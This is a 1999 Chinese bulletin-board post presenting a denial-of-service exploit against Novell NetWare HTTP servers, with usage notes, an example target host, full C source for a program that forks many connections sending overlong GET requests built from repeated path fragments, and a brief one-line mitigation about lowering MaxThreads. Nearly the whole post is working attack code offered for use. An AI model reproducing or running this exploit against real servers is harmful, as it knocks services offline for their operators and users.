发信人: coolinger()
整理人: williamlong(1999-11-02 19:29:25), 站内信件
|
对Novell的过载攻击,适用于以下配置:Novell NetWare 4.11& Novell-HTTP-Ser ver/3.1R1---结果是webserver死掉
Novell NetWare 4.1 & Novell-HTTP-Server/2.51R1 ---整个系统将当掉
安装了 YAWN/1.05 (crc:E8B0) 的Novell---Webserver 死掉 (除3.12和4.11外)
用法:www <vulnerable_host> <http_port> <how_many_connections> <string_ length>
如: www copernicus.9lo.lublin.pl 80 10 10000 Code:
在Linux下编译这段代码,生成执行文件www:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <sys/wait.h>
#define GET "GET"
#define PAT1 "/"
#define PAT2 "a/"
#define PAT3 "../"
#define PAT4 "./"
long getip(char *name)
{
struct hostent *hp;
long ip;
if ((ip=inet_addr(name))==-1)
{
if ((hp=gethostbyname(name))==NULL)
{
perror("gethostbyname");
exit(1);
}
memcpy(&ip, (hp->h_addr), 4);
}
return ip;
}
int main (argc, argv)
int argc;
char **argv;
{
struct sockaddr_in cli;
int sockfd, i, x, len;
char *msg1, *msg2, *msg3, *msg4;
if (argc < 5) { (void)fprintf(stderr, "usage: %s <host> <port> < connections> <len>\n", argv[0]); exit(0); }
bzero(&cli, sizeof(cli));
cli.sin_family = AF_INET;
cli.sin_addr.s_addr=getip(argv[1]);
cli.sin_port = htons(atoi(argv[2]));
len = atoi(argv[4]);
if (len < (sizeof(GET)+1+sizeof(PAT1))) { (void)fprintf(stderr, "len too small.\n"); exit(1); }
msg1 = (char *) malloc(len+sizeof(GET)+sizeof(PAT1)+1);
msg2 = (char *) malloc(len+sizeof(GET)+sizeof(PAT1)+1);
msg3 = (char *) malloc(len+sizeof(GET)+sizeof(PAT1)+1);
msg4 = (char *) malloc(len+sizeof(GET)+sizeof(PAT1)+1);
sprintf(msg1, "%s %s", GET, PAT1);
sprintf(msg2, "%s %s", GET, PAT1);
sprintf(msg3, "%s %s", GET, PAT1);
sprintf(msg4, "%s %s", GET, PAT1);
for(i=0;i<(len/sizeof(PAT1));i++) strcat(msg1, PAT1);
for(i=0;i<(len/sizeof(PAT2));i++) strcat(msg2, PAT2);
for(i=0;i<(len/sizeof(PAT3));i++) strcat(msg3, PAT3);
for(i=0;i<(len/sizeof(PAT4));i++) strcat(msg4, PAT4);
for(i=0;i<(atoi(argv[3]));i++) if (!(x=fork()))
{
if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0)
{
perror("socket");
exit(1);
}
if(connect(sockfd, (struct sockaddr *)&cli, sizeof(cli)) < 0)
{
perror("connect");
exit(1);
}
write(sockfd, msg1, strlen(msg1));
close(sockfd);
if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0)
{
perror("socket");
exit(1);
}
if(connect(sockfd, (struct sockaddr *)&cli, sizeof(cli)) < 0)
{
perror("connect");
exit(1);
}
write(sockfd, msg2, strlen(msg2));
close(sockfd);
if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0)
{
perror("socket");
exit(1);
}
if(connect(sockfd, (struct sockaddr *)&cli, sizeof(cli)) < 0)
{
perror("connect");
exit(1);
}
write(sockfd, msg3, strlen(msg3));
close(sockfd);
if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0)
{
perror("socket");
exit(1);
}
if(connect(sockfd, (struct sockaddr *)&cli, sizeof(cli)) < 0)
{
perror("connect");
exit(1);
}
write(sockfd, msg4, strlen(msg4));
close(sockfd);
exit(0);
}
waitpid(x,&i,0);
exit(0);
}
解决方案:这是一个过载攻击,原因在于web server的并行连接许可值配置:
httpd.cfg的 MaxThreads参数设置过高,缺省设置为16,比较安全,设得越高越危险
-- ※ 来源:.月光软件站 http://www.moon-soft.com.[FROM: 202.102.89.124]
|
|